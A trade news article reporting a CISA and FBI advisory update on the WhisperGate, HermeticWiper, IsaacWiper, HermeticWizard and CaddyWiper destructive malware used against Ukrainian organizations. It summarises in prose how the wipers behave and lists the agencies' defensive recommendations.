CISA, FBI provide updates on destructive malware targeting organizations in Ukraine, including WhisperGate malware

U.S. cybersecurity agencies updated their earlier advisory to include additional Indicators of Compromise (IOCs) for WhisperGate and provided technical details for HermeticWiper, IsaacWiper, HermeticWizard, and CaddyWiper destructive malware. Since January, these threat vectors have been deployed against organizations in Ukraine to destroy computer systems and render them inoperable. Additionally, the advisory provides recommended guidance and considerations for organizations to address network architecture, security baseline, continuous monitoring, and incident response practices.

“Leading up to Russia’s unprovoked attack against Ukraine, threat actors deployed destructive malware against organizations in Ukraine to destroy computer systems and render them inoperable,” the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) said in its latest advisory.

Destructive malware can pose a direct threat to an organization’s daily operations, impacting the availability of critical assets and data availability. Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries. Therefore, organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for such an event.

The advisory said that the hashes contain malicious binaries, droppers, and macros linked to WhisperGate cyber hackers’ activity. “The binaries are predominantly .Net and are obfuscated. Obfuscation varies; some of the binaries contain multiple layers of obfuscation. The analysis identified multiple uses of string reversal, character replacement, base64 encoding, and packing. Additionally, the malicious binaries contain multiple defenses, including VM checks, sandbox detection and evasion, and anti-debugging techniques. Finally, the sleep command was used in varying lengths via PowerShell to obfuscate execution on a victim’s network,” it added.

The advisory said that all Microsoft .doc files contain a malicious macro that is base64 encoded. “Upon enabling the macro, a PowerShell script runs a sleep command and then downloads a file from an external site. The script connects to the external website via HTTP to download an executable. Upon download, the executable is saved to the C:\Users\Public\Documents\ filepath on the victim host,” it added.

In the case of the HermeticWiper malware, the CISA received seven files for analysis. Five of these files were identified as the HermeticWiper, all digitally signed by Hermetica Digital Ltd. The other two files are 32-bit and 64-bit copies of the EaseUS Partition Master NT Driver (EPMNTDrv), all digitally signed by Chengdu Yiwo Technology Development Co., Ltd with an expired certificate issued in 2012, according to the Malware Analysis Report (MAR) released on Thursday. 

“The wiper contains four copies of compressed EPMNTDrv in its resource section. Each EPMNTDrv targets different versions and architectures of the Windows operating system (OS),” the HermeticWiper MAR said. Upon execution of the wiper, it extracts, expands, registers the driver with a service key, and starts the service immediately. After the driver service is started and the driver process lives in memory, the service key and associated driver files are deleted. The driver process enables the wiper to conduct read and write directly on the disk.

CISA said that the wiper overwrites the Master boot record (MBR), New Technologies File System (NTFS) boot sector, and data and attributes the system relies on for system restoration. In addition, the wiper sets a sleep timer, which can be its first numeric input. If the wiper runs with the administrative privilege or if the wiper’s name begins with the ‘c’ character, the expiration of the timer will trigger a forced system shutdown followed by an immediate reboot, rendering the system useless at that point, it added. 

“Before the timer expires, the wiper continues the fragmentation process on the disk and overwrites the File Allocation Table (FAT) file system Boot Sector or the NTFS Master File Table (MFT) and its backup in $MFTMirr, user’s files from user’s directories and the attributes and data contents of the Windows Event Logs with random bytes,” the MAR report said. Next, the wiper will stop the fragmentation, locate the allocated clusters and overwrite them with random bytes. Finally, the wiper overwrites itself with random bytes, and the wiping process is terminated.

In another MAR released Thursday covering details of the IsaacWiper and HermeticWizard malware, the CISA received six files for analysis: five 32-bit Dynamic-link Library (DLL) files and one 32-bit executable file. 

“During analysis of HermeticWizard, another file was dropped and identified as HermeticWiper. The submitted files are designed to spread laterally through a network via Server Message Block (SMB) and Windows Management Instrumentation (WMI),” according to the MAR report. These files attempt to overwrite the first 65536 bytes of data contained on the C:\ drive and any attached storage disks to render them useless to the victim user. The malware also creates a file and continuously writes to it until the disk runs out of free space and crashes. Upon reboot, the machine is no longer operable, it added.

In connection with the CaddyWiper destructive malware, CISA received one unique file for analysis. “This file is a malicious 32-bit Windows Portable Executable (PE). During runtime, this malware attempts to overwrite the victim user’s files with null bytes. The malware also attempts to overwrite the Master Boot Record of attached drives with null bytes, thereby corrupting them and rendering it impossible for the victim to access the victim’s stored data,” the MAR said.

Organizations have been urged to set antivirus and antimalware programs to conduct regular scans, enable strong spam filters to prevent phishing emails from reaching end users, filter network traffic, update software, and require multi-factor authentication.

On Jan. 15, Microsoft announced the identification of a sophisticated malware operation targeting multiple organizations in Ukraine. The WhisperGate malware has two stages that corrupt a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions. According to Microsoft’s assessment, WhisperGate is intended to be destructive and is designed to render targeted devices inoperable. Microsoft implemented protections to detect the WhisperGate malware family using Microsoft Defender Antivirus and Microsoft Defender for Endpoint, wherever these are deployed on-premises and cloud environments.

In reaction to this disclosure, the CISA called upon organizations to implement cybersecurity measures that protect against potential critical threats following reports of the WhisperGate malware wiping out data on Ukrainian computers in a coordinated attack. In addition, users of industrial control or operational technology (OT) systems were directed by the CISA to conduct a test of manual controls to ensure that critical functions remain operable if the organization’s network is unavailable or untrusted.

On Feb. 23, several cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record, which results in subsequent boot failure. 

Once again, the CISA and the FBI released an advisory that warned of hackers deploying destructive malware against Ukrainian organizations. It has been found that cybercriminals have tried to destroy computer systems and render them inoperable in the wake of the Russian attack on Ukraine. The alert also provides information on WhisperGate and HermeticWiper malware and provides details of the open-source IOCs for organizations to detect and prevent malware.

CISA has also warned critical infrastructure installations of malicious hackers using influence operations to shape public opinion, undermine trust, amplify division, and sow discord. It also issued a ‘Shields Up’ alert that notifies every organization in the country of potential risk from cyber threats that can disrupt essential services and potentially impact public safety.

On Wednesday, global cybersecurity authorities assessed in a joint cybersecurity advisory that in 2021 malicious cyber hackers aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. 

Global security agencies warned organizations last week that the Russian invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity from Russian state-sponsored cyber hackers or Russian-aligned cybercrime groups.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.